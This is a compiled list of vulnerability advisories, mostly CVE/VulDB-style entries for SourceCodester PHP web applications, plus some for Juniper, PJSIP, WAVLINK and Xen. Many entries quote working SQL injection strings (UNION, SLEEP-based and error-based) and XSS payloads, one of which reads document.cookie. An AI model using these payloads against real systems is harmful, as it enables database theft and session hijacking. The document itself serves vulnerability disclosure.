A vulnerability classified as critical has been found in SourceCodester Online Class and Exam Scheduling System 1.0. Affected is an unknown function of the file /pages/class_sched.php. The manipulation of the argument class with the input '||(SELECT 0x684d6b6c WHERE 5993=5993 AND (SELECT 2096 FROM(SELECT COUNT(*),CONCAT(0x717a786b71,(SELECT (ELT(2096=2096,1))),0x717a626271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||' leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-205830 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Simple Student Information System. It has been rated as critical. This issue affects some unknown processing of the file admin/departments/manage_department.php. The manipulation of the argument id with the input -5756%27%20UNION%20ALL%20SELECT%20NULL,database(),user(),NULL,NULL,NULL,NULL--%20- leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-205829 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Simple E-Learning System. It has been declared as problematic. This vulnerability affects unknown code of the file downloadFiles.php. The manipulation of the argument download leads to information disclosure. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-205828.
A vulnerability was found in SourceCodester Gym Management System. It has been classified as critical. This affects an unknown part of the component Exercises Module. The manipulation of the argument exer leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-205827.
A vulnerability was found in SourceCodester Company Website CMS and classified as critical. Affected by this issue is some unknown functionality of the file site-settings.php of the component Cookie Handler. The manipulation leads to improper access controls. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-205826 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic was found in SourceCodester Simple E-Learning System. This vulnerability affects unknown code of the file /claire_blake. The manipulation of the argument Bio leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-205822 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Gym Management System. This affects an unknown part of the component GET Parameter Handler. The manipulation of the argument day leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-205821 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Simple E-Learning System. It has been rated as critical. Affected by this issue is some unknown functionality of the file /claire_blake. The manipulation of the argument phoneNumber leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-205820.
A vulnerability was found in SourceCodester Simple E-Learning System. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file search.php. The manipulation of the argument searchPost leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-205819.
A vulnerability was found in SourceCodester Simple E-Learning System. It has been classified as critical. Affected is an unknown function of the file comment_frame.php. The manipulation of the argument post_id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-205818 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Company Website CMS and classified as critical. This issue affects some unknown processing. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-205817 was assigned to this vulnerability.
A vulnerability has been found in SourceCodester Electronic Medical Records System and classified as critical. This vulnerability affects unknown code of the file register.php of the component UPDATE Statement Handler. The manipulation of the argument pconsultation leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-205816.
A vulnerability, which was classified as problematic, was found in SourceCodester Wedding Hall Booking System. This affects an unknown part of the file /whbs/admin/?page=user of the component Staff User Profile. The manipulation of the argument First Name/Last Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-205815.
A vulnerability, which was classified as problematic, has been found in SourceCodester Wedding Hall Booking System. Affected by this issue is some unknown functionality of the file /whbs/?page=manage_account of the component Profile Page. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-205814 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic was found in SourceCodester Wedding Hall Booking System. Affected by this vulnerability is an unknown functionality of the file /whbs/?page=my_bookings of the component Booking Form. The manipulation of the argument Remarks leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-205813 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in SourceCodester Wedding Hall Booking System. Affected is an unknown function of the file /whbs/?page=contact_us of the component Contact Page. The manipulation of the argument Message leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-205812.
A vulnerability, which was classified as critical, was found in SourceCodester Gym Management System. Affected is an unknown function. The manipulation of the argument user_pass leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-205734 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in oretnom23 Fast Food Ordering System. This affects an unknown part of the component Menu List Page. The manipulation of the argument Description leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-205725 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Interview Management System 1.0 and classified as problematic. This issue affects some unknown processing of the file /addQuestion.php. The manipulation of the argument question with the input &lt;script&gt;alert(1)&lt;/script&gt; leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-205673 was assigned to this vulnerability.
A vulnerability has been found in SourceCodester Apartment Visitor Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /manage-apartment.php. The manipulation of the argument Apartment Number with the input &lt;script&gt;alert(1)&lt;/script&gt; leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-205672.
A vulnerability, which was classified as problematic, was found in SourceCodester Simple Food Ordering System 1.0. This affects an unknown part of the file /login.php. The manipulation of the argument email/password with the input "&gt;&lt;ScRiPt&gt;alert(1)&lt;/sCrIpT&gt; leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-205671.
A vulnerability, which was classified as problematic, has been found in SourceCodester Alphaware Simple E-Commerce System. Affected by this issue is some unknown functionality of the file stockin.php. The manipulation of the argument id with the input '"&gt;&lt;script&gt;alert(/xss/)&lt;/script&gt; leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-205670 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic was found in SourceCodester Online Student Admission System. Affected by this vulnerability is an unknown functionality of the file edit-profile.php of the component Student User Page. The manipulation with the input &lt;script&gt;alert(/xss/)&lt;/script&gt; leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-205669 was assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Church Management System 1.0. Affected is an unknown function of the file /login.php. The manipulation of the argument username with the input ' OR (SELECT 7064 FROM(SELECT COUNT(*),CONCAT(0x71627a7671,(SELECT (ELT(7064=7064,1))),0x716b707871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jURL leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-205668.
A vulnerability was found in SourceCodester Interview Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file /viewReport.php. The manipulation of the argument id with the input (UPDATEXML(9729,CONCAT(0x2e,0x716b707071,(SELECT (ELT(9729=9729,1))),0x7162766a71),7319)) leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-205667.
A vulnerability was found in SourceCodester Alphaware Simple E-Commerce System. It has been declared as critical. This vulnerability affects unknown code of the file admin_feature.php of the component Background Management Page. The manipulation leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-205666 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Apartment Visitor Management System 1.0. It has been classified as critical. This affects an unknown part of the file index.php. The manipulation of the argument username with the input ' AND (SELECT 4955 FROM (SELECT(SLEEP(5)))RSzF) AND 'htiy'='htiy leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-205665 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Electronic Medical Records System and classified as critical. Affected by this issue is some unknown functionality of the component POST Request Handler. The manipulation of the argument user_email leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-205664.
A vulnerability was found in Rigatur Online Booking and Hotel Management System aff6409. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file login.php of the component POST Request Handler. The manipulation of the argument email/pass leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-205657 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Garage Management System. It has been classified as critical. Affected is an unknown function of the file createUser.php. The manipulation of the argument userName/uemail leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-205656.
A vulnerability was found in SourceCodester Garage Management System and classified as critical. This issue affects some unknown processing of the file removeUser.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-205655.
A vulnerability was found in SourceCodester Loan Management System and classified as critical. This issue affects some unknown processing of the file delete_lplan.php. The manipulation of the argument lplan_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-205619.
A vulnerability has been found in SourceCodester Loan Management System and classified as critical. This vulnerability affects unknown code of the file login.php. The manipulation of the argument username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-205618 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Simple E-Learning System. Affected by this vulnerability is an unknown functionality of the file classroom.php. The manipulation of the argument post_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-205615.
A vulnerability classified as critical has been found in Private Cloud Management Platform. Affected is an unknown function of the file /management/api/rcx_management/global_config_query of the component POST Request Handler. The manipulation leads to improper authentication. It is possible to launch the attack remotely. VDB-205614 is the identifier assigned to this vulnerability.
A vulnerability classified as critical has been found in SourceCodester Multi Language Hotel Management Software. Affected is an unknown function. The manipulation of the argument email leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-205596.
A vulnerability was found in SourceCodester Multi Language Hotel Management Software. It has been rated as critical. This issue affects some unknown processing. The manipulation of the argument room_id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-205595.
A vulnerability was found in jeecg-boot. It has been declared as critical. This vulnerability affects unknown code of the file /api/. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-205594 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in SourceCodester Online Admission System. Affected is an unknown function of the file index.php. The manipulation of the argument eid with the input 8&lt;/h3&gt;&lt;script&gt;alert(1)&lt;/script&gt; leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-205572.
A vulnerability has been found in SourceCodester Garage Management System and classified as problematic. Affected by this vulnerability is an unknown functionality of the file edituser.php. The manipulation of the argument id with the input 1\"&gt;&lt;ScRiPt&gt;alert(1)&lt;/sCrIpT&gt; leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-205573 was assigned to this vulnerability.
A vulnerability was found in SourceCodester Online Admission System and classified as critical. This issue affects some unknown processing of the component GET Parameter Handler. The manipulation of the argument eid leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-205565 was assigned to this vulnerability.
A vulnerability has been found in SourceCodester Online Admission System and classified as critical. This vulnerability affects unknown code of the component POST Parameter Handler. The manipulation of the argument shift leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this entry is VDB-205564.
IOMMU: RMRR (VT-d) and unity map (AMD-Vi) handling issues T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Certain PCI devices in a system might be assigned Reserved Memory Regions (specified via Reserved Memory Region Reporting, "RMRR") for Intel VT-d or Unity Mapping ranges for AMD-Vi. These are typically used for platform tasks such as legacy USB emulation. Since the precise purpose of these regions is unknown, once a device associated with such a region is active, the mappings of these regions need to remain continuouly accessible by the device. This requirement has been violated. Subsequent DMA or interrupts from the device may have unpredictable behaviour, ranging from IOMMU faults to memory corruption.
IOMMU: RMRR (VT-d) and unity map (AMD-Vi) handling issues T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Certain PCI devices in a system might be assigned Reserved Memory Regions (specified via Reserved Memory Region Reporting, "RMRR") for Intel VT-d or Unity Mapping ranges for AMD-Vi. These are typically used for platform tasks such as legacy USB emulation. Since the precise purpose of these regions is unknown, once a device associated with such a region is active, the mappings of these regions need to remain continuouly accessible by the device. This requirement has been violated. Subsequent DMA or interrupts from the device may have unpredictable behaviour, ranging from IOMMU faults to memory corruption.
IOMMU: RMRR (VT-d) and unity map (AMD-Vi) handling issues T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Certain PCI devices in a system might be assigned Reserved Memory Regions (specified via Reserved Memory Region Reporting, "RMRR") for Intel VT-d or Unity Mapping ranges for AMD-Vi. These are typically used for platform tasks such as legacy USB emulation. Since the precise purpose of these regions is unknown, once a device associated with such a region is active, the mappings of these regions need to remain continuouly accessible by the device. This requirement has been violated. Subsequent DMA or interrupts from the device may have unpredictable behaviour, ranging from IOMMU faults to memory corruption.
IOMMU: RMRR (VT-d) and unity map (AMD-Vi) handling issues T[his CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] Certain PCI devices in a system might be assigned Reserved Memory Regions (specified via Reserved Memory Region Reporting, "RMRR") for Intel VT-d or Unity Mapping ranges for AMD-Vi. These are typically used for platform tasks such as legacy USB emulation. Since the precise purpose of these regions is unknown, once a device associated with such a region is active, the mappings of these regions need to remain continuouly accessible by the device. This requirement has been violated. Subsequent DMA or interrupts from the device may have unpredictable behaviour, ranging from IOMMU faults to memory corruption.
Null pointer dereference vulnerability in parser_unknown_property function in libsimba library prior to SMR Apr-2022 Release 1 allows out of bounds write by remote attacker.
A vulnerability classified as critical has been found in TEM FLEX-1085 1.6.0. Affected is an unknown function of the file /sistema/flash/reboot. The manipulation leads to denial of service. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, was found in SourceCodester Garage Management System 1.0. Affected is an unknown function of the file /php_action/createUser.php. The manipulation of the argument userName with the input lala&lt;img src="" onerror=alert(1)&gt; leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, has been found in SourceCodester Garage Management System 1.0. This issue affects some unknown processing of the file /php_action/createUser.php. The manipulation leads to improper access controls. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in SourceCodester Garage Management System 1.0. This vulnerability affects unknown code of the file /edituser.php. The manipulation of the argument id with the input -2'%20UNION%20select%2011,user(),333,444--+ leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Library Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /index.php. The manipulation of the argument RollNo with the input admin' AND (SELECT 2625 FROM (SELECT(SLEEP(5)))MdIL) AND 'KXmq'='KXmq&amp;Password=1231312312 leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in SourceCodester Library Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file lab.php. The manipulation of the argument Section with the input 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71716b7171,0x546e4444736b7743575a666d4873746a6450616261527a67627944426946507245664143694c6a4c,0x7162706b71),NULL,NULL,NULL,NULL# leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical has been found in SourceCodester Simple E-Learning System 1.0. Affected is an unknown function of the file search.php. The manipulation of the argument classCode with the input 1'||(SELECT 0x74666264 WHERE 5610=5610 AND (SELECT 7504 FROM(SELECT COUNT(*),CONCAT(0x7171627a71,(SELECT (ELT(7504=7504,1))),0x71717a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||' leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Simple E-Learning System 1.0. It has been rated as critical. This issue affects some unknown processing of the file classRoom.php. The manipulation of the argument classCode with the input 1'||(SELECT 0x6770715a WHERE 8795=8795 AND (SELECT 8342 FROM(SELECT COUNT(*),CONCAT(0x7171786b71,(SELECT (ELT(8342=8342,1))),0x717a7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||' leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in WAVLINK WN535K2 and WN535K3 and classified as critical. This issue affects some unknown processing of the file /cgi-bin/touchlist_sync.cgi. The manipulation of the argument IP leads to os command injection. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in WAVLINK WN535K2 and WN535K3 and classified as critical. This vulnerability affects unknown code of the file /cgi-bin/nightled.cgi. The manipulation of the argument start_hour leads to os command injection. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, was found in WAVLINK WN535K2 and WN535K3. This affects an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade. The manipulation of the argument key leads to os command injection. The exploit has been disclosed to the public and may be used.
PJSIP is a free and open source multimedia communication library written in C. A denial-of-service vulnerability affects applications on a 32-bit systems that use PJSIP versions 2.12 and prior to play/read invalid WAV files. The vulnerability occurs when reading WAV file data chunks with length greater than 31-bit integers. The vulnerability does not affect 64-bit apps and should not affect apps that only plays trusted WAV files. A patch is available on the `master` branch of the `pjsip/project` GitHub repository. As a workaround, apps can reject a WAV file received from an unknown source or validate the file first.
A null pointer dereference bug was found in wavpack-5.4.0 The results from the ASAN log: AddressSanitizer:DEADLYSIGNAL ===================================================================84257==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x561b47a970c6 bp 0x7fff13952fb0 sp 0x7fff1394fca0 T0) ==84257==The signal is caused by a WRITE memory access. ==84257==Hint: address points to the zero page. #0 0x561b47a970c5 in main cli/wvunpack.c:834 #1 0x7efc4f5c0082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) #2 0x561b47a945ed in _start (/usr/local/bin/wvunpack+0xa5ed) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV cli/wvunpack.c:834 in main ==84257==ABORTING
A vulnerability was found in SourceCodester Garage Management System 1.0 and classified as critical. This issue affects some unknown processing of the file /editbrand.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in SourceCodester Garage Management System 1.0 and classified as critical. This vulnerability affects unknown code of the file /login.php. The manipulation of the argument username with the input 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in URVE Web Manager. It has been rated as critical. This issue affects some unknown processing of the file _internal/uploader.php. The manipulation leads to unrestricted upload. The attack needs to be approached within the local network. The exploit has been disclosed to the public and may be used.
A vulnerability was found in URVE Web Manager. It has been declared as critical. This vulnerability affects unknown code of the file _internal/collector/upload.php. The manipulation leads to unrestricted upload. Access to the local network is required for this attack to succeed. The exploit has been disclosed to the public and may be used.
A vulnerability was found in URVE Web Manager. It has been classified as critical. This affects an unknown part of the file kreator.html5/img_upload.php. The manipulation leads to unrestricted upload. Access to the local network is required for this attack. The exploit has been disclosed to the public and may be used.
In Xpdf prior to 4.04, the DCT (JPEG) decoder was incorrectly allowing the 'interleaved' flag to be changed after the first scan of the image, leading to an unknown integer-related vulnerability in Stream.cc.
A vulnerability classified as problematic was found in SourceCodester Simple e-Learning System 1.0. Affected by this vulnerability is an unknown functionality of the file /vcs/claire_blake. The manipulation of the argument Bio with the input "&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt; leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, was found in SourceCodester Simple Parking Management System 1.0. This affects an unknown part of the file /ci_spms/admin/category. The manipulation of the argument vehicle_type with the input "&gt;&lt;script&gt;alert("XSS")&lt;/script&gt; leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as problematic, has been found in SourceCodester Simple Parking Management System 1.0. Affected by this issue is some unknown functionality of the file /ci_spms/admin/search/searching/. The manipulation of the argument search with the input "&gt;&lt;script&gt;alert("XSS")&lt;/script&gt; leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
PJSIP is a free and open source multimedia communication library written in C language implementing standard based protocols such as SIP, SDP, RTP, STUN, TURN, and ICE. Buffer overread is possible when parsing a specially crafted STUN message with unknown attribute. The vulnerability affects applications that uses STUN including PJNATH and PJSUA-LIB. The patch is available as a commit in the master branch (2.13.1).
OpenRazer is an open source driver and user-space daemon to control Razer device lighting and other features on GNU/Linux. Using a modified USB device an attacker can leak stack addresses of the `razer_attr_read_dpi_stages`, potentially bypassing KASLR. To exploit this vulnerability an attacker would need to access to a users keyboard or mouse or would need to convince a user to use a modified device. The issue has been patched in v3.5.1. Users are advised to upgrade and should be reminded not to plug in unknown USB devices.
H2 Console before 2.1.210 allows remote attackers to execute arbitrary code via a jdbc:h2:mem JDBC URL containing the IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT substring, a different vulnerability than CVE-2021-42392.
A vulnerability has been found in SourceCodester Clinics Patient Management System 2.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /pms/index.php of the component Login Page. The manipulation of the argument user_name with the input admin' or '1'='1 leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability, which was classified as critical, was found in SourceCodester Clinics Patient Management System 2.0. Affected is an unknown function of the file /pms/update_user.php?user_id=1. The manipulation of the argument profile_picture with the input &lt;?php phpinfo();?&gt; leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic was found in SourceCodester Simple Sales Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /ci_ssms/index.php/orders/create. The manipulation of the argument customer_name with the input &lt;script&gt;alert("XSS")&lt;/script&gt; leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as problematic has been found in SourceCodester Hotel Management System 2.0. Affected is an unknown function of the file /ci_hms/massage_room/edit/1 of the component Room Edit Page. The manipulation of the argument massageroomDetails with the input "&gt;&lt;script&gt;alert("XSS")&lt;/script&gt; leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Hotel Management System 2.0. It has been rated as problematic. This issue affects some unknown processing of the file /ci_hms/search of the component Search. The manipulation of the argument search with the input "&gt;&lt;script&gt;alert("XSS")&lt;/script&gt; leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in Online Hotel Booking System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file edit_room_cat.php of the component Room Handler. The manipulation of the argument roomname leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability has been found in Online Hotel Booking System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file edit_all_room.php of the component Room Handler. The manipulation of the argument id with the input 2828%27%20AND%20(SELECT%203766%20FROM%20(SELECT(SLEEP(5)))BmIK)%20AND%20%27YLPl%27=%27YLPl leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
An Uncontrolled Memory Allocation vulnerability leading to a Heap-based Buffer Overflow in the packet forwarding engine (PFE) of Juniper Networks Junos OS allows a network-based unauthenticated attacker to flood the device with traffic leading to a Denial of Service (DoS). The device must be configured with storm control profiling limiting the number of unknown broadcast, multicast, or unicast traffic to be vulnerable to this issue. This issue affects: Juniper Networks Junos OS on QFX5100/QFX5110/QFX5120/QFX5200/QFX5210/EX4600/EX4650 Series; 20.2 version 20.2R1 and later versions prior to 20.2R2. This issue does not affect: Juniper Networks Junos OS versions prior to 20.2R1.
A traffic classification vulnerability in Juniper Networks Junos OS on the SRX Series Services Gateways may allow an attacker to bypass Juniper Deep Packet Inspection (JDPI) rules and access unauthorized networks or resources, when 'no-syn-check' is enabled on the device. While JDPI correctly classifies out-of-state asymmetric TCP flows as the dynamic-application UNKNOWN, this classification is not provided to the policy module properly and hence traffic continues to use the pre-id-default-policy, which is more permissive, causing the firewall to allow traffic to be forwarded that should have been denied. This issue only occurs when 'set security flow tcp-session no-syn-check' is configured on the device. This issue affects Juniper Networks Junos OS on SRX Series: 18.4 versions prior to 18.4R2-S10, 18.4R3-S10; 19.1 versions prior to 19.1R3-S8; 19.2 versions prior to 19.2R1-S8, 19.2R3-S4; 19.3 versions prior to 19.3R3-S3; 19.4 versions prior to 19.4R3-S5; 20.1 versions prior to 20.1R3-S1; 20.2 versions prior to 20.2R3-S2; 20.3 versions prior to 20.3R3-S1; 20.4 versions prior to 20.4R2-S2, 20.4R3; 21.1 versions prior to 21.1R2-S2, 21.1R3; 21.2 versions prior to 21.2R2. This issue does not affect Juniper Networks Junos OS versions prior to 18.4R1.
A traffic classification vulnerability in Juniper Networks Junos OS on the SRX Series Services Gateways may allow an attacker to bypass Juniper Deep Packet Inspection (JDPI) rules and access unauthorized networks or resources, when 'no-syn-check' is enabled on the device. JDPI incorrectly classifies out-of-state asymmetric TCP flows as the dynamic-application INCONCLUSIVE instead of UNKNOWN, which is more permissive, causing the firewall to allow traffic to be forwarded that should have been denied. This issue only occurs when 'set security flow tcp-session no-syn-check' is configured on the device. This issue affects Juniper Networks Junos OS on SRX Series: 18.4 versions prior to 18.4R2-S9, 18.4R3-S9; 19.1 versions prior to 19.1R2-S3, 19.1R3-S6; 19.2 versions prior to 19.2R1-S7, 19.2R3-S3; 19.3 versions prior to 19.3R2-S6, 19.3R3-S2; 19.4 versions prior to 19.4R2-S5, 19.4R3-S3; 20.1 versions prior to 20.1R2-S2, 20.1R3; 20.2 versions prior to 20.2R3-S1; 20.3 versions prior to 20.3R3; 20.4 versions prior to 20.4R2-S1, 20.4R3; 21.1 versions prior to 21.1R1-S1, 21.1R2. This issue does not affect Juniper Networks Junos OS versions prior to 18.4R1.
A vulnerability was found in SourceCodester Library Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /librarian/bookdetails.php. The manipulation of the argument id with the input ' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Library Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/edit_admin_details.php?id=admin. The manipulation of the argument Name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability was found in SourceCodester Library Management System 1.0. It has been classified as critical. Affected is an unknown function of the component /card/index.php. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.
client_golang is the instrumentation library for Go applications in Prometheus, and the promhttp package in client_golang provides tooling around HTTP servers and clients. In client_golang prior to version 1.11.1, HTTP server is susceptible to a Denial of Service through unbounded cardinality, and potential memory exhaustion, when handling requests with non-standard HTTP methods. In order to be affected, an instrumented software must use any of `promhttp.InstrumentHandler*` middleware except `RequestsInFlight`; not filter any specific methods (e.g GET) before middleware; pass metric with `method` label name to our middleware; and not have any firewall/LB/proxy that filters away requests with unknown `method`. client_golang version 1.11.1 contains a patch for this issue. Several workarounds are available, including removing the `method` label name from counter/gauge used in the InstrumentHandler; turning off affected promhttp handlers; adding custom middleware before promhttp handler that will sanitize the request method given by Go http.Request; and using a reverse proxy or web application firewall, configured to only allow a limited set of methods.
A vulnerability in the automatic decryption process in Cisco Umbrella Secure Web Gateway (SWG) could allow an authenticated, adjacent attacker to bypass the SSL decryption and content filtering policies on an affected system. This vulnerability is due to how the decryption function uses the TLS Sever Name Indication (SNI) extension of an HTTP request to discover the destination domain and determine if the request needs to be decrypted. An attacker could exploit this vulnerability by sending a crafted request over TLS from a client to an unknown or controlled URL. A successful exploit could allow an attacker to bypass the decryption process of Cisco Umbrella SWG and allow malicious content to be downloaded to a host on a protected network. There are workarounds that address this vulnerability.
A vulnerability, which was classified as problematic, has been found in SourceCodester Prison Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/?page=system_info of the component System Name Handler. The manipulation with the input &lt;img src="" onerror="alert(1)"&gt; leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
A vulnerability classified as critical was found in SourceCodester Prison Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /classes/Users.php?f=save of the component New User Creation. The manipulation leads to improper authorization. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
